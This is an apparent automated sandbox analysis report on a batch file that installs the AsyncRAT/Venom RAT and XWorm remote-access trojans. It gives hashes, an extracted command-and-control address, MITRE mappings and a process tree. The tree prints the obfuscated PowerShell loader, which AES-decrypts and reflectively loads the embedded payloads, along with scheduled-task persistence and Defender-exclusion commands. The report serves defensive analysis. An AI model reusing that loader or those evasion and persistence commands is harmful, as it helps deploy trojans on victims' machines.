asyncrat | c97c51a6260a694daabe26dd47d5bc4304ad24e0e5e49fd906a13e99f3931734

Analysis

max time kernel
42s
max time network
43s
platform
windows11-21h2_x64
resource
win11-20240426-en
resource tags

arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
submitted
28-05-2024 14:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

planet x v5.bat
Size

448KB
MD5

8c4ca851ec8c215035857784815134d2
SHA1

2a0bf3160c0bc0979b27b241a5bc9fd13069ab2f
SHA256

c97c51a6260a694daabe26dd47d5bc4304ad24e0e5e49fd906a13e99f3931734
SHA512

9c6765ea2fa3c14d29c441bf07e3fcac4ade33e996a4926e0c42a4b22906434721e3be5b7267b5a2e83a09ad68f552f9c9823a47f477928b6168bda1e8f6e7d9
SSDEEP

6144:21m/ysEZubRskU36lHu1BpVtPEeL2oUmH5lpr4qUA4sVzlSUb57+qd7dhoRWk9i+:249PbRq3I4BpDE9onlBpfVga5PdJWg+

Score

10^/10

asyncrat xworm default execution persistence rat trojan

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

127.0.0.1:38173

Mutex

epykvfetbqzwboxh

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

xworm

19.ip.gl.ply.gg:38173

Attributes

Install_directory
%Userprofile%
install_file
Runtime Broker.exe

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\XClient.exe	family_xworm
behavioral1/memory/4844-75-0x0000000000AF0000-0x0000000000B0A000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\Client.exe	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

4920 powershell.exe
4244 powershell.exe
3672 powershell.exe
3780 powershell.exe
3180 powershell.exe
1968 powershell.exe
3728 powershell.exe

Drops startup file 2 IoCs

Processes:

XClient.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk	XClient.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk	XClient.exe

Executes dropped EXE 3 IoCs

Processes:

Client.exeXClient.exeRuntime Broker.exe

pid process

4456 Client.exe
4844 XClient.exe
1152 Runtime Broker.exe

pid	process
4456	Client.exe
4844	XClient.exe
1152	Runtime Broker.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

XClient.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Users\\Admin\\Runtime Broker.exe"	XClient.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

1344 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

5016 timeout.exe
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Local Settings powershell.exe

pid	process
1344	schtasks.exe

pid	process
5016	timeout.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

Processes:

powershell.exepowershell.exepowershell.exeClient.exepowershell.exepowershell.exepowershell.exepowershell.exeXClient.exe

pid	process
4920	powershell.exe
4920	powershell.exe
4244	powershell.exe
4244	powershell.exe
3672	powershell.exe
3672	powershell.exe
4456	Client.exe
4456	Client.exe
3780	powershell.exe
3780	powershell.exe
3180	powershell.exe
3180	powershell.exe
1968	powershell.exe
1968	powershell.exe
3728	powershell.exe
3728	powershell.exe
4844	XClient.exe
4456	Client.exe
4456	Client.exe
4456	Client.exe
4456	Client.exe
4456	Client.exe
4456	Client.exe
4456	Client.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4920	powershell.exe
Token: SeDebugPrivilege	4244	powershell.exe
Token: SeIncreaseQuotaPrivilege	4244	powershell.exe
Token: SeSecurityPrivilege	4244	powershell.exe
Token: SeTakeOwnershipPrivilege	4244	powershell.exe
Token: SeLoadDriverPrivilege	4244	powershell.exe
Token: SeSystemProfilePrivilege	4244	powershell.exe
Token: SeSystemtimePrivilege	4244	powershell.exe
Token: SeProfSingleProcessPrivilege	4244	powershell.exe
Token: SeIncBasePriorityPrivilege	4244	powershell.exe
Token: SeCreatePagefilePrivilege	4244	powershell.exe
Token: SeBackupPrivilege	4244	powershell.exe
Token: SeRestorePrivilege	4244	powershell.exe
Token: SeShutdownPrivilege	4244	powershell.exe
Token: SeDebugPrivilege	4244	powershell.exe
Token: SeSystemEnvironmentPrivilege	4244	powershell.exe
Token: SeRemoteShutdownPrivilege	4244	powershell.exe
Token: SeUndockPrivilege	4244	powershell.exe
Token: SeManageVolumePrivilege	4244	powershell.exe
Token: 33	4244	powershell.exe
Token: 34	4244	powershell.exe
Token: 35	4244	powershell.exe
Token: 36	4244	powershell.exe
Token: SeIncreaseQuotaPrivilege	4244	powershell.exe
Token: SeSecurityPrivilege	4244	powershell.exe
Token: SeTakeOwnershipPrivilege	4244	powershell.exe
Token: SeLoadDriverPrivilege	4244	powershell.exe
Token: SeSystemProfilePrivilege	4244	powershell.exe
Token: SeSystemtimePrivilege	4244	powershell.exe
Token: SeProfSingleProcessPrivilege	4244	powershell.exe
Token: SeIncBasePriorityPrivilege	4244	powershell.exe
Token: SeCreatePagefilePrivilege	4244	powershell.exe
Token: SeBackupPrivilege	4244	powershell.exe
Token: SeRestorePrivilege	4244	powershell.exe
Token: SeShutdownPrivilege	4244	powershell.exe
Token: SeDebugPrivilege	4244	powershell.exe
Token: SeSystemEnvironmentPrivilege	4244	powershell.exe
Token: SeRemoteShutdownPrivilege	4244	powershell.exe
Token: SeUndockPrivilege	4244	powershell.exe
Token: SeManageVolumePrivilege	4244	powershell.exe
Token: 33	4244	powershell.exe
Token: 34	4244	powershell.exe
Token: 35	4244	powershell.exe
Token: 36	4244	powershell.exe
Token: SeIncreaseQuotaPrivilege	4244	powershell.exe
Token: SeSecurityPrivilege	4244	powershell.exe
Token: SeTakeOwnershipPrivilege	4244	powershell.exe
Token: SeLoadDriverPrivilege	4244	powershell.exe
Token: SeSystemProfilePrivilege	4244	powershell.exe
Token: SeSystemtimePrivilege	4244	powershell.exe
Token: SeProfSingleProcessPrivilege	4244	powershell.exe
Token: SeIncBasePriorityPrivilege	4244	powershell.exe
Token: SeCreatePagefilePrivilege	4244	powershell.exe
Token: SeBackupPrivilege	4244	powershell.exe
Token: SeRestorePrivilege	4244	powershell.exe
Token: SeShutdownPrivilege	4244	powershell.exe
Token: SeDebugPrivilege	4244	powershell.exe
Token: SeSystemEnvironmentPrivilege	4244	powershell.exe
Token: SeRemoteShutdownPrivilege	4244	powershell.exe
Token: SeUndockPrivilege	4244	powershell.exe
Token: SeManageVolumePrivilege	4244	powershell.exe
Token: 33	4244	powershell.exe
Token: 34	4244	powershell.exe
Token: 35	4244	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

Client.exeXClient.exe

pid process

4456 Client.exe
4844 XClient.exe

pid	process
4456	Client.exe
4844	XClient.exe

Suspicious use of WriteProcessMemory 30 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.exeXClient.execmd.exe

description	pid	process	target process
PID 1336 wrote to memory of 4920	1336	cmd.exe	powershell.exe
PID 1336 wrote to memory of 4920	1336	cmd.exe	powershell.exe
PID 4920 wrote to memory of 4244	4920	powershell.exe	powershell.exe
PID 4920 wrote to memory of 4244	4920	powershell.exe	powershell.exe
PID 4920 wrote to memory of 3200	4920	powershell.exe	WScript.exe
PID 4920 wrote to memory of 3200	4920	powershell.exe	WScript.exe
PID 3200 wrote to memory of 128	3200	WScript.exe	cmd.exe
PID 3200 wrote to memory of 128	3200	WScript.exe	cmd.exe
PID 128 wrote to memory of 3672	128	cmd.exe	powershell.exe
PID 128 wrote to memory of 3672	128	cmd.exe	powershell.exe
PID 3672 wrote to memory of 4456	3672	powershell.exe	Client.exe
PID 3672 wrote to memory of 4456	3672	powershell.exe	Client.exe
PID 3672 wrote to memory of 4844	3672	powershell.exe	XClient.exe
PID 3672 wrote to memory of 4844	3672	powershell.exe	XClient.exe
PID 4844 wrote to memory of 3780	4844	XClient.exe	powershell.exe
PID 4844 wrote to memory of 3780	4844	XClient.exe	powershell.exe
PID 4844 wrote to memory of 3180	4844	XClient.exe	powershell.exe
PID 4844 wrote to memory of 3180	4844	XClient.exe	powershell.exe
PID 4844 wrote to memory of 1968	4844	XClient.exe	powershell.exe
PID 4844 wrote to memory of 1968	4844	XClient.exe	powershell.exe
PID 4844 wrote to memory of 3728	4844	XClient.exe	powershell.exe
PID 4844 wrote to memory of 3728	4844	XClient.exe	powershell.exe
PID 4844 wrote to memory of 1344	4844	XClient.exe	schtasks.exe
PID 4844 wrote to memory of 1344	4844	XClient.exe	schtasks.exe
PID 4844 wrote to memory of 4696	4844	XClient.exe	schtasks.exe
PID 4844 wrote to memory of 4696	4844	XClient.exe	schtasks.exe
PID 4844 wrote to memory of 1948	4844	XClient.exe	cmd.exe
PID 4844 wrote to memory of 1948	4844	XClient.exe	cmd.exe
PID 1948 wrote to memory of 5016	1948	cmd.exe	timeout.exe
PID 1948 wrote to memory of 5016	1948	cmd.exe	timeout.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\planet x v5.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3xOzG4jhhkcaXQQK8UNuUswDOtFpNkDEDd4fSd1w7qk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t90Jt5EglVd/UHOjjuP4kg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cMVRk=New-Object System.IO.MemoryStream(,$param_var); $dwXmc=New-Object System.IO.MemoryStream; $BjMRe=New-Object System.IO.Compression.GZipStream($cMVRk, [IO.Compression.CompressionMode]::Decompress); $BjMRe.CopyTo($dwXmc); $BjMRe.Dispose(); $cMVRk.Dispose(); $dwXmc.Dispose(); $dwXmc.ToArray();}function execute_function($param_var,$param2_var){ $fNKgh=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $pSDnv=$fNKgh.EntryPoint; $pSDnv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\planet x v5.bat';$FmcDj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\planet x v5.bat').Split([Environment]::NewLine);foreach ($choRp in $FmcDj) { if ($choRp.StartsWith(':: ')) { $DqwHc=$choRp.Substring(3); break; }}$payloads_var=[string[]]$DqwHc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4920
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_501_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_501.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4244
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_501.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3200
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_501.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:128
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3xOzG4jhhkcaXQQK8UNuUswDOtFpNkDEDd4fSd1w7qk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t90Jt5EglVd/UHOjjuP4kg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cMVRk=New-Object System.IO.MemoryStream(,$param_var); $dwXmc=New-Object System.IO.MemoryStream; $BjMRe=New-Object System.IO.Compression.GZipStream($cMVRk, [IO.Compression.CompressionMode]::Decompress); $BjMRe.CopyTo($dwXmc); $BjMRe.Dispose(); $cMVRk.Dispose(); $dwXmc.Dispose(); $dwXmc.ToArray();}function execute_function($param_var,$param2_var){ $fNKgh=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $pSDnv=$fNKgh.EntryPoint; $pSDnv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_501.bat';$FmcDj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_501.bat').Split([Environment]::NewLine);foreach ($choRp in $FmcDj) { if ($choRp.StartsWith(':: ')) { $DqwHc=$choRp.Substring(3); break; }}$payloads_var=[string[]]$DqwHc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3672
      - C:\Users\Admin\AppData\Roaming\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Client.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:4456
      - C:\Users\Admin\AppData\Roaming\XClient.exe
        
        "C:\Users\Admin\AppData\Roaming\XClient.exe"
        6⤵
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4844
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3780
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3180
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Runtime Broker.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3728
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Admin\Runtime Broker.exe"
        7⤵
        Creates scheduled task(s)
        
        PID:1344
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /f /tn "Runtime Broker"
        7⤵
        
        PID:4696
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD36D.tmp.bat""
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1948
        
        C:\Windows\system32\timeout.exe
        
        timeout 3
        8⤵
        Delays execution with timeout.exe
        
        PID:5016

C:\Users\Admin\Runtime Broker.exe
"C:\Users\Admin\Runtime Broker.exe"
1⤵
- Executes dropped EXE
PID:1152

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
df472dcddb36aa24247f8c8d8a517bd7

SHA1
6f54967355e507294cbc86662a6fbeedac9d7030

SHA256
e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

SHA512
06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
781da0576417bf414dc558e5a315e2be

SHA1
215451c1e370be595f1c389f587efeaa93108b4c

SHA256
41a5aef8b0bbeea2766f40a7bba2c78322379f167c610f7055ccb69e7db030fe

SHA512
24e283aa30a2903ebe154dad49b26067a45e46fec57549ad080d3b9ec3f272044efaaed3822d067837f5521262192f466c47195ffe7f75f8c7c5dcf3159ea737

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
83bb6fbc6c0d5ba9c329deb390a7537c

SHA1
17186e2a1e86412ed87f4af3dc983efe393aea6c

SHA256
fb922cb7aba5188b5157ab04d407e6d56f0d949fc7d42eb309d117e44f53d7d8

SHA512
3add0a83d5d56ecc36627816587d0fcd997e0090ef5c5b679e0f40d93b09f2c6a4a2c0433e883993acbbe6686976883985e139854ef699bd74b24fa3a8bc5fff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4ca42e9cc6de90060a4503debda3ea58

SHA1
652f325e5c423876d85ba1a164301ab2d147604b

SHA256
67b7e0001e15e60f1e5c92ce49644ce08500a099fd94135d179b8dfe0513567c

SHA512
38303f1959a2fe056c3cdba1fc775538c21b20364c25154d9f8ca365f3abf8a240b3d3851b8854ddf33a994ae0ef55b6fdaafe695eef658a2386f0c8e05b1e10

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
12b69b5aa3b65136b7baf6b9adb56208

SHA1
0d05db9469da423799d92ad04fbe690f3533ef84

SHA256
890619ee616c917ec73c077ae2852813908f46c24ab63d7f498b514463fa1533

SHA512
ba78f4c18ca63f52e9d789059eece05ae4812091df031d001d267a16e306338bf3881af46908517f3e3f02ed907df91dee072bf0042cd4edd8d689d048f29a0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e8eb51096d6f6781456fef7df731d97

SHA1
ec2aaf851a618fb43c3d040a13a71997c25bda43

SHA256
96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864

SHA512
0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_blzsptsj.xfa.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpD36D.tmp.bat

Filesize
156B

MD5
93cddaabef5c57391c4083a9833e8a66

SHA1
ab7599f3bdb432a5c7fb61e2fac17498ba11d527

SHA256
84fe5bfa433ed80b0902f02ee59dd1e808da8965f79f797b50db98689bf47fbf

SHA512
014f81a580f59c0f17e11672b143365565971305bfe82b76fd56750f8fb62c8c65b79deb61fe3b970c167c0765da6bc1c84b1e570ca0d4077ca4003ecc22b4c3

Download Submit
C:\Users\Admin\AppData\Roaming\Client.exe

Filesize
74KB

MD5
f8ec02f0ad41f3e984037b398641f3bb

SHA1
88d64ad9840e65bcd5d27323a0fe2214d00d7346

SHA256
12cdd3df8d582bc30a49c2b4f8cf96d522e0f01d64f2e7df17276dc89fdb1a75

SHA512
31d177cceba0a3698f696c5daa0265ebe3fecf8a2a2934290e574789811a68c7313c1b0b40b1bae88666088c87fc9336941e10f26952a442c9cc3ca9637f5322

Download Submit
C:\Users\Admin\AppData\Roaming\XClient.exe

Filesize
75KB

MD5
74fcef65a288af74b2a36dd6895264f8

SHA1
d5d73bb877f0aee6962f49c87603eec9d5b4846b

SHA256
ed308d6d8768d98145916f4529e0b444058105f401acf1e01bdacadf39a637b1

SHA512
c342445070326c126ae5841cc88a3cdcd2ae6bd995a37903ca6cacb517dc3ed7ada4c9fb7c020ad814824d2a5a29fd909da895c40475aec5ec6499778e25772a

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_501.bat

Filesize
448KB

MD5
8c4ca851ec8c215035857784815134d2

SHA1
2a0bf3160c0bc0979b27b241a5bc9fd13069ab2f

SHA256
c97c51a6260a694daabe26dd47d5bc4304ad24e0e5e49fd906a13e99f3931734

SHA512
9c6765ea2fa3c14d29c441bf07e3fcac4ade33e996a4926e0c42a4b22906434721e3be5b7267b5a2e83a09ad68f552f9c9823a47f477928b6168bda1e8f6e7d9

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_501.vbs

Filesize
115B

MD5
7ff4cfd6e94f55346befcc0a6911b217

SHA1
eca5e2d60d004f6d021f90151855d32a889d941f

SHA256
ec982ba97a696d19636be8e6e3b08892cd53520cd3c462389b3be71c139b8590

SHA512
295ff6bb566c645d2d406794e41a65e316f5e941af6154b0a84b705721e7ab2a59c10eff167c253a12b2f986928b474c886a8fdcbe1139ec335e315d75ca2ed7

Download Submit
memory/3672-49-0x0000016D6A6C0000-0x0000016D6A6F0000-memory.dmp

Filesize
192KB

Download
memory/3672-48-0x0000016D6A660000-0x0000016D6A6B6000-memory.dmp

Filesize
344KB

Download
memory/4244-21-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp

Filesize
10.8MB

Download
memory/4244-30-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp

Filesize
10.8MB

Download
memory/4244-27-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp

Filesize
10.8MB

Download
memory/4244-26-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp

Filesize
10.8MB

Download
memory/4244-25-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp

Filesize
10.8MB

Download
memory/4456-73-0x00000000003D0000-0x00000000003E8000-memory.dmp

Filesize
96KB

Download
memory/4844-75-0x0000000000AF0000-0x0000000000B0A000-memory.dmp

Filesize
104KB

Download
memory/4844-125-0x000000001B790000-0x000000001B79C000-memory.dmp

Filesize
48KB

Download
memory/4920-14-0x00000216C9330000-0x00000216C9386000-memory.dmp

Filesize
344KB

Download
memory/4920-0-0x00007FFD77043000-0x00007FFD77045000-memory.dmp

Filesize
8KB

Download
memory/4920-13-0x00000216B0EE0000-0x00000216B0EE8000-memory.dmp

Filesize
32KB

Download
memory/4920-12-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp

Filesize
10.8MB

Download
memory/4920-11-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp

Filesize
10.8MB

Download
memory/4920-10-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp

Filesize
10.8MB

Download
memory/4920-120-0x00007FFD77043000-0x00007FFD77045000-memory.dmp

Filesize
8KB

Download
memory/4920-121-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp

Filesize
10.8MB

Download
memory/4920-9-0x00000216B0EF0000-0x00000216B0F12000-memory.dmp

Filesize
136KB

Download